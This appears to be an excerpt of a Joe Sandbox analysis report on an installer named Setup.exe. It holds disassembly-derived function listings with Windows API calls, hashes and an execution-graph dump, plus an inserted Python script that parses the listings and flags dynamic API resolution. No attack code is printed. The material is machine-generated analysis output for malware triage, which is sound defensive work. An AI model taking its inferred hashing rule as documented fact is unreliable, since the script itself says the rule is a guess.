                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                              • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                                              • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                              • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              Strings
                                                                                                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                              • API String ID: 1697273262-1764544995
                                                                                                                                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                              • API String ID: 2577523808-3778932970
                                                                                                                                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: lstrcatwsprintf
• String ID: %02x%c$...
• API String ID: 3065427908-1057055748
• Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
• Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
• Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
• Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
APIs
• OleInitialize.OLE32(00000000), ref: 00405083
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
• OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
Similarity
• API ID: InitializeMessageSendUninitializelstrlenwvsprintf
• String ID: Section: "%s"$Skipping section: "%s"
• API String ID: 2266616436-4211696005
• Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
• Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
• Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
• Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
APIs
• GetDC.USER32(?), ref: 00402100
• GetDeviceCaps.GDI32(00000000), ref: 00402107
• MulDiv.KERNEL32(00000000,00000000), ref: 00402117
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
• CreateFontIndirectW.GDI32(00420110), ref: 0040216A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
Similarity
• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
• Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
• Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
• Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
• Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
APIs
  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
• lstrcmpW.KERNEL32(?,Version ), ref: 00407276
• lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
Strings
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
• Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
• Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
APIs
• DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
• Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
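Each entry above lists a function's imported calls (subcalls included) and a derived "API ID" that the report uses for similarity matching. The following Python is an added example for this page, not Joe Sandbox code: it parses entries in this listing format, rebuilds the API ID from the raw API names, and flags entries that resolve imports at run time (GetProcAddress / LoadLibrary*), which is the behaviour behind the report's "Contains functionality to dynamically determine API calls" signature. The token rule it uses to rebuild the API ID (split each name on CamelCase, drop the A/W suffix and tokens shorter than four characters, count, order by count then ASCII, join count groups with `$`) is inferred from the entries on this page and is an assumption, not a documented Joe Sandbox algorithm; the sample text is copied from this report's own listing.

```python
"""Parse the per-function "APIs" / "Similarity" entries of a Joe Sandbox report and
rebuild each entry's "API ID" from the raw API names.

Added example for this page, not Joe Sandbox code. The token rule (split each API
name on CamelCase, drop the A/W suffix and any token shorter than four characters,
count tokens, order by count descending then by ASCII, join the count groups with
'$') is inferred from the entries on this page; it is an assumption, not a
documented Joe Sandbox algorithm."""
import re
from collections import Counter

# One line of an "APIs" list; subcall lines carry a "Part of subcall function" prefix.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
)
# CamelCase splitter: "GetDeviceCaps" -> Get, Device, Caps; "lstrcpynW" -> lstrcpyn, W.
TOKEN_RE = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+|[a-z]+")
MIN_TOKEN = 4  # assumption: Get, Ole, Mul, Div, DC and the A/W suffix never show up in the page's API IDs

# Run-time import resolution: the behaviour behind the report's
# "Contains functionality to dynamically determine API calls" signature.
DYNAMIC_RESOLVE = {"GetProcAddress", "LoadLibrary", "LoadLibraryEx"}


def parse_blocks(text):
    """One dict per function entry: (api, module, subcall) triples in listing order,
    plus the report's own API ID and String ID when the entry carries them."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "api_id": None, "string_id": None}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m["api"], m["mod"], m["sub"]))
        elif line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            cur["string_id"] = line.split(":", 1)[1].strip()
    return blocks


def api_tokens(api):
    return [t for t in TOKEN_RE.findall(api) if len(t) >= MIN_TOKEN]


def api_id(apis):
    """Rebuild the API ID string for a list of (api, module, subcall) triples."""
    counts = Counter(t for api, _, _ in apis for t in api_tokens(api))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def dynamic_resolution(apis):
    """True when the entry resolves imports at run time (GetProcAddress / LoadLibrary*)."""
    return any(re.sub(r"[AW]$", "", api) in DYNAMIC_RESOLVE for api, _, _ in apis)


def check(text):
    """Per entry: (API ID as reported, API ID rebuilt here, resolves imports at run time)."""
    return [(b["api_id"], api_id(b["apis"]), dynamic_resolution(b["apis"]))
            for b in parse_blocks(text)]


# Constructed input: three entries copied verbatim from this report's function listing.
SAMPLE = """\
APIs
• DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
APIs
  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
• lstrcmpW.KERNEL32(?,Version ), ref: 00407276
• lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
"""

if __name__ == "__main__":
    for reported, rebuilt, dynamic in check(SAMPLE):
        print(f"reported={reported!r} rebuilt={rebuilt!r} "
              f"match={reported == rebuilt} dynamic_resolution={dynamic}")
```

The rebuilt IDs match the reported ones for every complete entry in this section, which is what makes the inferred rule useful: when two reports give the same API ID for a function, the same token multiset is behind it, and a GetProcAddress hit inside a WideCharToMultiByte / GlobalAlloc sequence is the NSIS-style pattern of converting a wide-character export name to ANSI before resolving it, rather than a statically imported call.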
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
APIs
• IsWindowVisible.USER32(?), ref: 0040492E
• CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Similarity
• API ID: PrivateProfileStringlstrcmp
• String ID: !N~
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Similarity
• API ID: CloseHandlelstrlenwvsprintf
• String ID: RMDir: RemoveDirectory invalid input("")
APIs
• lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
• lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
• CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
• lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:3.2%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:3.5%
                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                              Total number of Limit Nodes:65
103493->103502 103503 dbf4df 81 API calls 103493->103503 103504 dbf346 207 API calls 103493->103504 103508 dfffaf 8 API calls 103493->103508 103495 dabe38 103494->103495 103496 dabe67 103495->103496 103511 dabfa5 103495->103511 103496->103493 103498->103493 103499->103493 103500->103493 103501->103493 103502->103493 103503->103493 103504->103493 103505->103471 103506->103489 103507->103493 103508->103493 103509->103489 103510->103476 103528 dacf80 103511->103528 103513 dabfb5 103514 df0db6 103513->103514 103515 dabfc3 103513->103515 103516 dab4c8 8 API calls 103514->103516 103517 dc014b 8 API calls 103515->103517 103519 df0dc1 103516->103519 103518 dabfd4 103517->103518 103520 dabf73 8 API calls 103518->103520 103522 dabfde 103520->103522 103521 dabfed 103524 dc014b 8 API calls 103521->103524 103522->103521 103523 dabed9 8 API calls 103522->103523 103523->103521 103525 dabff7 103524->103525 103536 dabe7b 39 API calls 103525->103536 103527 dac01b 103527->103496 103529 dad1c7 103528->103529 103534 dacf93 103528->103534 103529->103513 103531 dabf73 8 API calls 103531->103534 103532 dad03d 103532->103513 103534->103531 103534->103532 103537 dc05b2 5 API calls __Init_thread_wait 103534->103537 103538 dc0413 29 API calls __onexit 103534->103538 103539 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103534->103539 103536->103527 103537->103534 103538->103534 103539->103534 103540 dd947a 103541 dd9487 103540->103541 103545 dd949f 103540->103545 103597 dcf649 20 API calls __dosmaperr 103541->103597 103543 dd948c 103598 dd2b5c 26 API calls __wsopen_s 103543->103598 103546 dd94fa 103545->103546 103554 dd9497 103545->103554 103599 de0144 21 API calls 2 library calls 103545->103599 103560 dcdcc5 103546->103560 103549 dd9512 103567 dd8fb2 103549->103567 103551 dd9519 103552 dcdcc5 __fread_nolock 26 API calls 103551->103552 103551->103554 103553 dd9545 103552->103553 103553->103554 103555 dcdcc5 __fread_nolock 26 API calls 103553->103555 103556 dd9553 
103555->103556 103556->103554 103557 dcdcc5 __fread_nolock 26 API calls 103556->103557 103558 dd9563 103557->103558 103559 dcdcc5 __fread_nolock 26 API calls 103558->103559 103559->103554 103561 dcdce6 103560->103561 103562 dcdcd1 103560->103562 103561->103549 103600 dcf649 20 API calls __dosmaperr 103562->103600 103564 dcdcd6 103601 dd2b5c 26 API calls __wsopen_s 103564->103601 103566 dcdce1 103566->103549 103568 dd8fbe CallCatchBlock 103567->103568 103569 dd8fde 103568->103569 103570 dd8fc6 103568->103570 103572 dd90a4 103569->103572 103576 dd9017 103569->103576 103668 dcf636 20 API calls __dosmaperr 103570->103668 103675 dcf636 20 API calls __dosmaperr 103572->103675 103573 dd8fcb 103669 dcf649 20 API calls __dosmaperr 103573->103669 103580 dd903b 103576->103580 103581 dd9026 103576->103581 103577 dd90a9 103676 dcf649 20 API calls __dosmaperr 103577->103676 103579 dd8fd3 __wsopen_s 103579->103551 103602 dd54ba EnterCriticalSection 103580->103602 103670 dcf636 20 API calls __dosmaperr 103581->103670 103584 dd9041 103586 dd905d 103584->103586 103587 dd9072 103584->103587 103585 dd902b 103671 dcf649 20 API calls __dosmaperr 103585->103671 103672 dcf649 20 API calls __dosmaperr 103586->103672 103603 dd90c5 103587->103603 103592 dd9033 103677 dd2b5c 26 API calls __wsopen_s 103592->103677 103593 dd9062 103673 dcf636 20 API calls __dosmaperr 103593->103673 103594 dd906d 103674 dd909c LeaveCriticalSection __wsopen_s 103594->103674 103597->103543 103598->103554 103599->103546 103600->103564 103601->103566 103602->103584 103604 dd90ef 103603->103604 103605 dd90d7 103603->103605 103606 dd9459 103604->103606 103610 dd9134 103604->103610 103694 dcf636 20 API calls __dosmaperr 103605->103694 103717 dcf636 20 API calls __dosmaperr 103606->103717 103608 dd90dc 103695 dcf649 20 API calls __dosmaperr 103608->103695 103613 dd913f 103610->103613 103617 dd90e4 103610->103617 103621 dd916f 103610->103621 103612 dd945e 103718 dcf649 20 API calls __dosmaperr 103612->103718 103696 
dcf636 20 API calls __dosmaperr 103613->103696 103615 dd914c 103719 dd2b5c 26 API calls __wsopen_s 103615->103719 103617->103594 103618 dd9144 103697 dcf649 20 API calls __dosmaperr 103618->103697 103622 dd9188 103621->103622 103623 dd91ae 103621->103623 103624 dd91ca 103621->103624 103622->103623 103630 dd9195 103622->103630 103698 dcf636 20 API calls __dosmaperr 103623->103698 103678 dd3b93 103624->103678 103626 dd91b3 103699 dcf649 20 API calls __dosmaperr 103626->103699 103685 ddfc1b 103630->103685 103632 dd91ba 103700 dd2b5c 26 API calls __wsopen_s 103632->103700 103633 dd9333 103636 dd93a9 103633->103636 103640 dd934c GetConsoleMode 103633->103640 103638 dd93ad ReadFile 103636->103638 103637 dd91ea 103641 dd2d38 _free 20 API calls 103637->103641 103642 dd93c7 103638->103642 103643 dd9421 GetLastError 103638->103643 103639 dd91c5 __fread_nolock 103656 dd2d38 _free 20 API calls 103639->103656 103640->103636 103644 dd935d 103640->103644 103645 dd91f1 103641->103645 103642->103643 103650 dd939e 103642->103650 103648 dd942e 103643->103648 103649 dd9385 103643->103649 103644->103638 103651 dd9363 ReadConsoleW 103644->103651 103646 dd91fb 103645->103646 103647 dd9216 103645->103647 103707 dcf649 20 API calls __dosmaperr 103646->103707 103709 dd97a4 103647->103709 103715 dcf649 20 API calls __dosmaperr 103648->103715 103649->103639 103712 dcf613 20 API calls __dosmaperr 103649->103712 103650->103639 103662 dd93ec 103650->103662 103663 dd9403 103650->103663 103651->103650 103655 dd937f GetLastError 103651->103655 103655->103649 103656->103617 103657 dd9200 103708 dcf636 20 API calls __dosmaperr 103657->103708 103658 dd9433 103716 dcf636 20 API calls __dosmaperr 103658->103716 103713 dd8de1 31 API calls 3 library calls 103662->103713 103663->103639 103665 dd941a 103663->103665 103714 dd8c21 29 API calls __wsopen_s 103665->103714 103667 dd941f 103667->103639 103668->103573 103669->103579 103670->103585 103671->103592 103672->103593 103673->103594 103674->103579 
103675->103577 103676->103592 103677->103579 103679 dd3bd1 103678->103679 103683 dd3ba1 __dosmaperr 103678->103683 103721 dcf649 20 API calls __dosmaperr 103679->103721 103681 dd3bbc RtlAllocateHeap 103682 dd3bcf 103681->103682 103681->103683 103701 dd2d38 103682->103701 103683->103679 103683->103681 103720 dc521d 7 API calls 2 library calls 103683->103720 103686 ddfc28 103685->103686 103687 ddfc35 103685->103687 103722 dcf649 20 API calls __dosmaperr 103686->103722 103689 ddfc41 103687->103689 103723 dcf649 20 API calls __dosmaperr 103687->103723 103689->103633 103691 ddfc2d 103691->103633 103692 ddfc62 103724 dd2b5c 26 API calls __wsopen_s 103692->103724 103694->103608 103695->103617 103696->103618 103697->103615 103698->103626 103699->103632 103700->103639 103702 dd2d6c __dosmaperr 103701->103702 103703 dd2d43 RtlFreeHeap 103701->103703 103702->103637 103703->103702 103704 dd2d58 103703->103704 103725 dcf649 20 API calls __dosmaperr 103704->103725 103706 dd2d5e GetLastError 103706->103702 103707->103657 103708->103639 103726 dd970b 103709->103726 103712->103639 103713->103639 103714->103667 103715->103658 103716->103639 103717->103612 103718->103615 103719->103617 103720->103683 103721->103682 103722->103691 103723->103692 103724->103691 103725->103706 103735 dd5737 103726->103735 103728 dd971d 103729 dd9725 103728->103729 103730 dd9736 SetFilePointerEx 103728->103730 103748 dcf649 20 API calls __dosmaperr 103729->103748 103732 dd974e GetLastError 103730->103732 103734 dd972a 103730->103734 103749 dcf613 20 API calls __dosmaperr 103732->103749 103734->103630 103736 dd5759 103735->103736 103737 dd5744 103735->103737 103742 dd577e 103736->103742 103752 dcf636 20 API calls 